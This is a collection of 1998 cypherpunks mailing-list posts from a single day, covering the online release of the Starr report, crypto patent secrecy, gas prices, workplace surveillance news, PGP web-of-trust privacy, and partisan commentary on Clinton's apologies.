Message-ID: <Pine.LNX.3.96.980911124049.451C-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain






On Fri, 11 Sep 1998, Declan McCullagh wrote:

etc delete....

Declan:

Is there any effort underway to mirror the report to various
archives?  This is going to kill the DC internet corridor
otherwise.

jim burnes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 11 Sep 1998 06:04:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
Message-ID: <35F903D8.3E787140@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:
> 
> Not per se, though there _is_ still one major restriction -
> the Defense Department gets a crack at patent applications,
> so if you try to patent a crypto algorithm or crypto phone,
> they can seize and classify your patent application and
> working materials, using the excuse of "national security".
> There was a case in the late 70s where somebody tried to patent
> a wimpy analog scrambler for CB radios, and got it seized,
> and a number of patent applications that got delayed a long time.

It seems then to be advisable to apply for international patents
simultaneously. One can e.g. apply for a European patent that is 
valid for a number of countries.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Fri, 11 Sep 1998 12:07:54 +0800
To: "'Steve Bryan'" <tcmay@got.net>
Subject: RE: Bits are Bits
Message-ID: <D104150098E6D111B7830000F8D90AE8240641@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain





> -----Original Message-----
> From:	Steve Bryan [SMTP:sbryan@vendorsystems.com]
	[...]
>  But I have not yet seen CD-ROMs for rent or even available to 
> check out for home use  from the public library. 
	[...]
	[forgive the lame quoting format - I'm using
	a Microsoft product.]

	I was in my town library yesterday, and they
	were loaning CDROMs. I was in a hurry, so did
	not check the details. At least one was made by
	National Geographic. (BTW: You can get the *entire*
	*run* of NG on CDROM, which I think is pretty neat.)

	Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 11 Sep 1998 12:12:34 +0800
To: cypherpunks@cyberpass.net
Subject: Fighting DMV clerical errors in NYC:
Message-ID: <35F9594E.6CCD7C2F@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



A friend of mine asked me to forward this question to you guys:

IMHO he needs a good lawyer, but maybe someone here knows more:

-----------------------------------------------------------------------------

> Any particular thing you want to fight @ the DMV or just in general?

They are preventing me from renewing my license due to a clerical error they 
made over a year ago. Since I did not respond to their letter (I didn't 
understand what they were talking about) they suspended my license. That 
caused my insurance company to drop me. When I renewed my insurance (a 
second error, if you have a suspension you can not get insurance) they told 
me it was cleared.

I need to talk to someone who can help me resolve this without me having to 
hand in my license and plate for the 90 day penalty


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <fisherm@tce.com>
Date: Fri, 11 Sep 1998 13:10:43 +0800
To: "'Ray Arachelian'" <cypherpunks@Algebra.COM
Subject: RE: oil, greens, recycling, and poly-ticks.
Message-ID: <2C396693FBDED111AEF60000F84104A721BFAA@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian writes:
>Just out of curiosity what are prices around where you guys live?

Prices here range from .97-.99 for name brands (Shell, etc.) and around .89
for no-name brands right now.
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Their walls are built of cannon balls, their motto is
'Don't Tread on Me'"


> .
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Fri, 11 Sep 1998 13:37:09 +0800
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: RE: Bits are Bits
In-Reply-To: <D104150098E6D111B7830000F8D90AE8240641@exna02.securitydynamics.com>
Message-ID: <v03102803b21f1dc9770f@[192.168.3.63]>
MIME-Version: 1.0
Content-Type: text/plain



>> -----Original Message-----
>> From:	Steve Bryan [SMTP:sbryan@vendorsystems.com]
>	[...]
>>  But I have not yet seen CD-ROMs for rent or even available to
>> check out for home use  from the public library.
>	[...]
>	[forgive the lame quoting format - I'm using
>	a Microsoft product.]
>
>	I was in my town library yesterday, and they
>	were loaning CDROMs. I was in a hurry, so did
>	not check the details. At least one was made by
>	National Geographic. (BTW: You can get the *entire*
>	*run* of NG on CDROM, which I think is pretty neat.)
>
>	Peter Trei

They have CD-ROM's at our local public library but only for use at the
library. It isn't possible to check them out for use at home. I don't know
if this is a legal issue or just a matter of policy but it is annoying.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 16:15:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Web sites preparing for Starr report onslaught
Message-ID: <199809112115.OAA15319@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Web sites preparing for Starr report onslaught
Date: Fri, 11 Sep 1998 06:40:46 -0500
To: believer@telepath.com

Source:  Fox News - AP

Web sites preparing for Starr report onslaught
 2.42 a.m. ET (642 GMT) September 11, 1998

 By Chris Allbritton, Associated Press

 NEW YORK (AP) - Web surfers hoping to view portions of Independent Counsel
Kenneth Starr's report when it goes online today instead may need to wait
in line. 

 An expert in high-volume Web sites said millions of Web surfers -
clustered around Web sites like people used to cluster around teletype
machines waiting for the latest dispatches from news wire services -
probably will swamp the government's computers. 

 "I would imagine a lot of people getting a 'Site Not Available'
(message),'' said J.D. Zeeman, who coordinated IBM's Web site for the
Winter Olympics in Nagano, Japan, earlier this year. 

 At one point, the Olympics site was getting more than 110,000 hits a
minute, Zeeman said. 

 By Thursday afternoon, the crush of people visiting the House's Web site -
called Thomas - prompted this message: "The Library of Congress is aware of
public statements announcing the availability of the Independent Counsel's
report at this site. As yet, the House of Representatives has taken no
action regarding the public availability of this report.'' 

 A House vote on releasing the report was planned for today. 

 "The technology exists to handle this kind of load today, but it literally
takes months to get it in place,'' Zeeman said. "Unless they've done
something, I wouldn't imagine they would be adequately prepared.'' 

 A congressional source said the House is adequately prepared, posting the
report on government sites and distributing formatted copies to Web sites
of major newspapers, magazines, The Associated Press and other news
services, and online outlets such as America Online and Yahoo! 

 The Web has become a popular way to distribute government documents in the
past few years, but the last time a government body tried to release
red-hot documents on the Web, it was a disaster. It was the case of Louise
Woodward, the British au pair accused of murder. 

 In November 1997, Massachusetts Superior Court Judge Hiller B. Zobel said
he would release on the Web his decision to reduce Woodward's conviction to
manslaughter. Millions on both sides of the Atlantic who had followed the
story eagerly anticipated the first online release of a criminal court
ruling. 

 But a power outage delayed the ruling for hours, and heavy traffic at Web
sites made it almost impossible for people to read the decision once it was
online. 

 The foul-up with the Woodward decision, while embarrassing, was not
unique. News sites usually slow down, or even crash, when the always
increasing number of Web surfers rushes online for news. It happened during
the Woodward case, after the death of Princess Diana and during the recent
gyrations of the stock market. 

 The slowdowns are just the nature of news on the Internet. The parallel is
a newspaper that assigns many reporters to a major story such as the
Oklahoma City bombing, or printing a lengthy report by an independent
counsel. 

 "I guess when you think of throwing all sorts of reporters on a story,
you're straining resources,'' said Ruth Gersh, editor of AP's multimedia
services. "If you put up the report on the Web, it uses up resources which
we call bandwidth.'' 

 Congressional leaders expect the report to be available this afternoon
through these government Web addresses: 

 -http://thomas.loc.gov/icreport 

 -http://www.house.gov/icreport 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 16:15:08 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Privacy: Companies admit spying on staff
Message-ID: <199809112115.OAA15330@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Privacy: Companies admit spying on staff
Date: Fri, 11 Sep 1998 12:14:18 -0500
To: believer@telepath.com

Source:  The Age (Australia)
http://www.theage.com.au:80/daily/980910/news/news19.html

Companies admit spying on staff 

By LEON GETTLER 

More than one in two of Australia's largest companies carry out
video surveillance of their employees and the general public, a
survey has found.

The survey revealed that 94 per cent of the companies also
monitored employees' phone conversations, electronic mail and
Internet usage although the focus appeared to be mostly on
volume and frequency rather than content.

For example, 16 per cent monitored phone usage while the
conversations themselves were only monitored by 2 per cent.
Similarly, email usage was monitored by 13 per cent while 6 per
cent of the companies were combing through the actual
messages. Scrutiny of Internet usage would also reveal the web
sites that employees had visited.

The PricewaterhouseCoopers survey found that 65 per cent of
companies regarded monitoring as a normal part of employment
and 85 per had informed their employees that they were being
watched. However, they were often not as forthcoming about
seemingly minor details, like time and place.

PricewaterhouseCoopers information and security partner Mr
Stephen Woolley said there was a better than 50-50 chance that
Australians would be filmed or recorded at some stage during
the day. In the case of the general public, it would be without
their consent.

``As is the practice of companies both here and overseas, this
information will probably go on file for some years,'' Mr
Woolley said.

About half the companies said information gathered in Australia
on customers, employees and the general public was sent
overseas for international data bases.

The study also revealed alarming gaps in the privacy guidelines
of some companies.

Only 35 per cent had formally documented privacy policies in
place and 38 per cent said they did not undertake any
monitoring to ensure compliance with in-house privacy
guidelines. Eight out of 10 organisations did not require staff to
undertake privacy training.

The survey covered 65 of Australia's largest companies spanning
across all major industries including utilities, telecommunications,
natural resources, retail, credit, banking and finance, insurance
and manufacturing.

Based on their total turnover and size of assets, the companies
that responded to the survey would represent more than half of
corporate Australia.

More than one in 10 companies did not inform staff that they
could be monitored.
 
Published by The Age Online Pty Ltd ACN 069 962 885
(c)1998 David Syme & Co Ltd 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 16:14:55 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: Plans for internet banks in Australia, says Ernst & Young
Message-ID: <199809112115.OAA15341@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)
Subject: SNET: Plans for internet banks in Australia, says Ernst & Young
Date: Sat, 12 Sep 1998 03:04:23 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

Plans for internet banks in Australia, says Ernst & Young

Sydney, Sept 9 AAP - Offshore and local companies have strategic plans to
establish stand alone
Internet banks in Australia to compete with the existing banking network,
financial services
consultants Ernst & Young said today.

Ernst & Young partner Andrew Keene, who specialises in technology strategy
for financial
institutions, said the international consulting firm was aware of both
overseas and domestic
companies with plans for internet banks.

"There are some plans that we are aware of," Mr Keene told reporters. "I
believe most of the plans
are formative."

He declined to name the companies.

Ernst & Young yesterday released its latest report on technology in banking
and financial services,
with more t0 of the world's largest financial institutions in 26 countries
participating in the seventh
global study.

Entitled Electronic Commerce and Connecting to the Customer, the report
analyses the technology
spending plans of banks, insurance companies, asset management and
brokerage institutions in the
United States, Europe, Asia and Australia.

The report found that technology spending priorities of Australia's
financial institutions to develop
new customer channels have been surpassed by the "more immediate issues" of
mergers and
acquisitions, the millennium bug and the Euro.

Kevin Hall, the national leader of Ernst & Young's Australian financial
services consulting group,
said that the new spending priorities "have meant that spending on the
critical area of improved
customer services has been delayed".

He said that the report found that financial institutions are "anticipating
heavy increases" in
technology spending, with technology budgets rising 14 percent in calendar
1998, tapering off to six
percent by 2001.

"But while spending rates will decline over time, the actual budget amounts
will continue to increase,
with actual budgets project to double between 1992 and 2000," he said.

However, technology budgets are predominantly being spent on mandated
projects such as computer
upgrades to avoid the Year 2000 software date problem.

The survey also found that only 12 percent of Australian institutions
believed that the internet will
help them retain customers and business, compared to 47 percent of US
respondents and 34 percent
of European respondents.

Russell Ives, a data warehouse specialist at the firm, said that Australian
banks view Internet services
such as electronic commerce or e-commerce as cost-saving devices whereas US
banks used it to
"focus on retaining customers".

"The great opportunity that exists for financial institutions in Australia
is to refocus their e-commerce
strategy towards customer retention," said Mr Hall, adding that some
institutions are "unsure how to
use" e-commerce.

Australian financial institutions are also behind their overseas
counterparts in integrating customer
data to develop sophisticated knowledge of customer needs to enhance the
cross-selling of products
and target services.

"Nobody has really integrated its completely," Mr Hall said of Australian
financial institutions.

Mr Ives said that banks have to advance data integration rapidly,
especially when it comes to
refocusing e-commerce strategies on customer retention.

Overseas banks such as Wells Fargo, Bank of Montreal and ING Bank are some
of the leaders in
e-commerce and internet.

"So our conclusion is that the most effective financial institutions will
develop alliances to deliver
electronic commerce," Mr Keene said.

AAP pjg 10/09/98 08-09NZ

(c) New Zealand Press Association



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimg@mentat.com (Jim Gillogly)
Date: Fri, 11 Sep 1998 16:27:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies
Message-ID: <199809112128.OAA14441@zendia.mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Yes, there's crypto content in this msg... a passing reference four
paragraphs down.

Somebody said:
> The annoying thing about Clinton's recent behavior is that he never
> comes right out and apologizes, but the press always says he does.
Somebody goes on to do the whole Apology Watch number in detail.

It doesn't matter.  One commentator a few weeks ago had a good line
for it: "All mea and no culpa."  But so what?  This whole apology watch
is totally meaningless.  We know he can perform sincere-looking speeches
on demand, and that's largely why we elected him.  If he gives another
one and says this time that he's really <very> <very> sorry and he's
guilty as hell, I couldn't be more impressed.  Or less.  What he says
about it is irrelevant.

This whole "sex scandal" thing is ludicrous also -- we knew he was a
horn-dog when we elected him.  Yes, my sexual morality is considerably
higher than his, but so what?  Sexual abstinence has never been a
criterion for being President, and probably only one President in
living memory <didn't> have sex outside of wedlock... Peter Langston
published a "Know your Presidents" column in the last few days, a quiz
regarding which Presidents had done what to whom in the Oval Office.
Regarding covering up the sex -- so what?  When he said they weren't
having sex back in February, she was denying it at the time, so it'd
take a pretty sleazy character to say he was schtupping her and she was
lying about it.

The fact is that this sex between consenting adults thing is the best
Starr could do with his Whitewater investigation after umpteen years
and witnesses and millions of dollars, and I'm not impressed.  I'm
<much> more impressed with the kind of allegations Softwar digs up --
sweetheart deals for some company to send encryption to China while
sitting on the bulk of the domestic encryption industry, for example.
If he's really done something that involves treason or high crimes and
misdemeanors, let's hear about it and act on it.  But airing soiled
linen in public isn't germane.

If they <do> decide this is now a requirement for high office, I'd like
to see all the Congresscritters who've had sex out of wedlock and
concealed it take one step forward.  Shall we make hypocrisy in high
office impeachable also?

Today Dave Farber noted that if the CDA were constitutional (which it
isn't) Congress wouldn't have been allowed to drool over all these
salacious bits on the public networks.

	Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 11 Sep 1998 23:53:23 +0800
To: cypherpunks@Algebra.COM
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <35F7F329.E4836699@brainlink.com>
Message-ID: <3.0.5.32.19980911143828.00899c80@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Some whining Yankee wrote: 
>>What pisses me off is that in NYC the gas prices are ridiculous high...
>>$1.35/Gal is the regular gas, drive just a few miles over a tunnel or bridge 
>>to n NJ, it's $1.00 or $.99 depending on which pump you hit...  go a bit
>south,
>>say VA, and in some areas it drops as low as $0.87 a gallon!

Over in Europe, prices are mostly about $1 -- per liter.

Back here in California, prices have been varying a lot, and
are generally higher in areas with lots of people, lots of money,
or lots of restrictions on gas stations.   Here in San Francisco,
it's about $1.30, and down in Silicon Valley it's mostly about
$1.20, with some cheaper stations and some more expensive.
We have different gas - for environmental reasons, they add
chemicals designed to pollute water and irritate people's lungs
(while reducing smog a bit.)

Those New Jersey prices, while lower than New York, are still
articifially high, since they're "full-service".  The People's 
Republic of New Jersey *knows* that regular untrained citizens
can't be trusted to pump their own gasoline reliably -
otherwise you'd be having frequent explosions at gasoline
stations like you do in the rest of the country.
Any time the legislature begins to suggest legalizing
self-service gas, small gas station owners pretending to be
little old ladies write to all the newspapers protesting that
they'd have to pay a lot more money to have gas pumped for them
and how dare these politicians be so mean to YOUR grandmothers,
and the threat disappears again for a few years.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 11 Sep 1998 15:15:39 +0800
To: Ryan Lackey <proff@iq.org>
Subject: Re: cypherpunks archive
In-Reply-To: <tw7g1dypwzc.fsf@denmark-vesey.MIT.EDU>
Message-ID: <19980911161107.A1444@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain




Rate limit it for the masses; sell access to an unlimited version of
the site?

Adam


| Anyone have 1gb of disk space on a machine, optionally with root access,
| on a machine with unmetered network access outside the US on which I
| could put the archive?
| 
| I can put the archive here in AI, but I'll have to charge per megabyte,
| as my t1 is metered-use :(  It would end up being something on the order of
| $0.50/MB for total traffic, and unfortunately there are no good payment
| systems for that kind of thing right now.

--
"I only work at Security Dynamics because of food poisoning." -- Anon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 11 Sep 1998 16:19:29 +0800
To: cypherpunks@einstein.ssz.com
Subject: Starr Report on Openpgp.net
Message-ID: <199809112119.RAA19044@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I have put a copy of the report on my website:

http://www.openpgp.net/starr

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: See the Future; See OS/2.  Be the Future; Run OS/2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfmV5Y9Co1n+aLhhAQH96gP+MhFHy9ma8IaVbHDmrPDj6h7weTbOw/LU
P0PFocm73GTkbXlRVZIEKSC2Jt2+TGtegMRwPtVuKTL6nONj5C/kn0tPFcfLW3rX
lQ6cbbNJxwg0rdkAMIm424bdEI5TWdThBXalwY9cOlUeDpOtN3QUni4DetNCbDXd
qqPFpVQNk5E=
=DLNv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 11 Sep 1998 18:32:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809112128.OAA14441@zendia.mentat.com>
Message-ID: <35F9B3BD.6DE6@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly wrote:
>
> The fact is that this sex between consenting adults thing is the best
> Starr could do with his Whitewater investigation after umpteen years
> and witnesses and millions of dollars, and I'm not impressed.  I'm
> <much> more impressed with the kind of allegations Softwar digs up --
> sweetheart deals for some company to send encryption to China while
> sitting on the bulk of the domestic encryption industry, for example.
> If he's really done something that involves treason or high crimes and
> misdemeanors, let's hear about it and act on it.  But airing soiled
> linen in public isn't germane.
> 
It's worse than not impressive: it's PATHETIC. I thought we'd have 425
pages of real output relating to the last 6 years of "work" and 25 pages
of Monica. I'd rather finance $600 toilet seats and $1200 gold-plated
hammers with my tax money than Starr's brand of open political warfare.
It's simple, partisan, Rottweiler politics. The kind of stuff that makes
you leave your shoes outside the door when you get home at night.

> If they <do> decide this is now a requirement for high office, I'd like
> to see all the Congresscritters who've had sex out of wedlock and
> concealed it take one step forward.  Shall we make hypocrisy in high
> office impeachable also?
> 
I'd say hypocrisy is more of a hangin' offense, like horse thievin' or
cattle rustlin'. I seethe when I listen to an asshole like Arlin Spectre
or Jerry Falwell spouting off about Clinton. I'm no great fan of
Clinton's but the attackers in this particular shitstorm are lower than
pond scum. I can't wait till they crawl back to the cesspool they came
from.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 11 Sep 1998 23:43:31 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Starr report and CDA
Message-ID: <33CCFE438B9DD01192E800A024C84A19284651@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




The US government violates their own CDA by posting this graphically
detailed report to the Internet. Am I the only one that doesn't find
that ironic. Well it's good ammo (perhaps) for the next time the CDA
comes up.

	Matt

> 
> http://www.cnn.com/starr.report/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 11 Sep 1998 10:59:57 +0800
To: cypherpunks@cyberpass.net
Subject: Clinton's fake apologies
Message-ID: <199809111600.SAA12943@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The annoying thing about Clinton's recent behavior is that he never
comes right out and apologizes, but the press always says he does.

Case in point:

> WASHINGTON (Reuters) - Saying ``I have sinned,'' a tearful President
> Clinton made an impassioned plea Friday for forgiveness from Monica
> Lewinsky and others and vowed to fight hard to keep his job.

But what did he say?

> ``I don't think there is a fancy way to say that I have sinned,''
> Clinton said, hours before independent counsel Kenneth Starr's report
> to Congress on his eight-month investigation into the Lewinsky scandal
> was to be made public.

He didn't say that he had sinned, he said that there wasn't a fancy way
to say that he had sinned.  He never came right out and said, "I have
sinned".

Another example:

> ``It is important to me that everybody who has been hurt know that the
> sorrow I feel is genuine -- first and most important my family, also my
> friends, my staff, my cabinet, Monica Lewinsky and her family, and the
> American people. I have asked all for their forgiveness,'' said Clinton.
> 
> It was the first time he had actually asked publicly for the forgiveness
> of Lewinsky...

But he didn't ask publicly for the forgiveness of Lewinsky.  He said that
he had already asked her for forgiveness.  Is this really true?  Has he
really spoken with her?  Or is it another lie?

Another example, from while Clinton was in Ireland:

> DUBLIN, Ireland (AP) - President Clinton said for the first time Friday
> ``I'm sorry'' about his affair with Monica Lewinsky, describing his
> behavior as indefensible as he sought to calm the growing storm that
> has shaken his presidency.

Here's what he actually said:

> ``I've already said that I made a bad mistake, it was indefensible and
> I'm sorry about it,'' Clinton said, questioned at a photo opportunity
> with Irish Prime Minister Bertie Ahern. It was the first time he had
> used the word ``sorry.''

The wording is not quite as obvious here, but in the video record it was
clear that he was saying that he had already said that his behavior was
indefensible and that he was sorry about it.  Of course, this is not true,
he had never said that.

Knowing Clinton's lawyerlike mind, we can only assume that his wording
is carefully chosen.  He could easily have said, "I don't think there is
a fancy way to say it, but I have sinned," or, with regard to Lewinsky
and company, "I ask here for forgiveness from them all."

No doubt he takes a measure of satisfaction in knowing that his calculated
public contriteness is carefully arranged to make it seem like he is
saying things which he actually is not.  Clinton loves lies, and it
must be thrilling to lie brazenly and to be praised for his openness
and honesty as he does so.  For a professional hypocrite like Clinton,
there can be no greater reward.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 11 Sep 1998 23:53:55 +0800
To: "Ivan Nabe Cypherpunk" <cypherpunks@Algebra.COM>
Subject: Webs of Trust, Conspiracies, and Six Degrees of Cypherpunks
In-Reply-To: <199809091200.IAA18283@www.video-collage.com>
Message-ID: <3.0.5.32.19980911192912.00959c50@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:47 AM 9/11/98 -0700, Vladimir Z. Nuri wrote:
>wow, a new site called sixdegrees.com, in which everyone
>registers and reveals who their friends are. the privacy
>implications are really incredible. yet supposedly
>close to 1 million people joined, with 900,000 of them
>connected!!

We've got a somewhat related Cypherpunks problem,
which is PGP key signatures.  The traditional software
likes chains of less than 4 deep, yet the last time
I checked the key servers, there were chains as deep as 
12-14, and most people seemed to be at least 6 signatures
away from Phil Zimmermann or Derek Atkins, who were the
centers of the list at the time.  (On the other hand, 
I suppose a lot of signatures between Joe Cypherpunk, 
Ivan Cypherpunk, T0T0M0nger, etc. could improve the averages :-)

The PGP Web of Trust key management tools have the
difficulty that they don't make it easy to decide which 
signatures on your key to export when giving someone
a key to sign or distributing a key to a key server.
You can manage this somewhat by creating different
name/key pairs for different uses, with your
	Phil Zimmermann, Respected Entrepreneur
key signed by venture capitalists and your
	Phil Zimmermann, Anti-Nuclear Activist
signed by your fellow activists, and trying to make
sure that people who attend meetings at the bank building
where you have your office digitally sign in with their
Respectable Software Developer or Free Speech Activist personnas,
and not with their
	Buddhist Temple Assault Rifle Shooting Club
personnas that seem to overlap with the Respected Entrepreneur web....

I'm not sure how solvable a problem this is - 
there are some parts that are easier to solve, like
- storing secret keyrings entirely in encrypted form
	This could be done using a disk encryptor instead,
	or could be done using an additional passphrase
	to unlock the keyring before determining whether
	the specific key you want it on it; both are annoying.
	The threat is the attack currently being used against T0T0,
	whose secret keyring had a key for a personna that signed a
	supposedly incriminating message.  In his case, it was probably
	just ranting or humor, but there are some PGP users who really
	_are_ trying to overthrow their governments.
and friendlier GUI tools (e.g. the current PGPkeys lets you
	add and delete signatures from a key in the keyring,
	but doesn't let you decide which ones to export except
	by deleting them (or by exporting to a separate keyring
	and using the GUI on that keyring, which is awkward.)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Fri, 11 Sep 1998 22:02:49 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <35F9B3BD.6DE6@lsil.com>
Message-ID: <199809120319.UAA20709@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain



Michael Motyka <mmotyka@lsil.com>

> It's worse than not impressive: it's PATHETIC. I thought we'd have 425
> pages of real output relating to the last 6 years of "work" and 25 pages
> of Monica. I'd rather finance $600 toilet seats and $1200 gold-plated
> hammers with my tax money than Starr's brand of open political warfare.
> It's simple, partisan, Rottweiler politics. The kind of stuff that makes
> you leave your shoes outside the door when you get home at night.

>From what I have read of Ken Starr's report Washington insider's all 
knew of Clinton's relationship with "That Woman".  Now if Law 
Enforcement (LA) knows Clinton has skeletons in his closet they can 
go to him and tell him he must support lets just say a total ban on 
strong encryption.  Clinton is inbetween a rock and a hard place, he 
must go along with proposals from LA, whether he supports the 
proposals in principle or not.

We have seen some of Clinton's dirty laundry in a segment of his 
life that his attorney wife was not able to advise him.  Now do you 
think Clinton's general standard of morality was any different in his 
life before this scandal in areas where his attorney wife was able to 
pull the strings?  I personally doubt it. 

I see the whole OIC crusade against Clinton as an attempt to bring 
honesty to government.  Ken Starr is just playing the game by the 
rules set out be the Clintons.  If the game looks too rough who do 
you blame? 




Virtually

Raymond D. Mereniuk
Raymond@fbn.bc.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 11 Sep 1998 22:31:09 +0800
To: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Subject: Re: CDA? What CDA?
In-Reply-To: <19980912030005.7730.qmail@nym.alias.net>
Message-ID: <199809120332.XAA24689@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <19980912030005.7730.qmail@nym.alias.net>, on 09/12/98 
   at 03:00 AM, lcs Mixmaster Remailer <mix@anon.lcs.mit.edu> said:


>CNN. Pathfinder. Everybody and his dog with a website. The White House.
>Posting "indecent material" on the web.

>I mean, I'm impressed.


>(A bit more seriously though: could this fact possibly help - in the
>future - if the US gvt was again seeking to "curb indecency onm the
>Net"?)

It sure will be a nice thing to throw in thier face next time they bring
CDA up. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

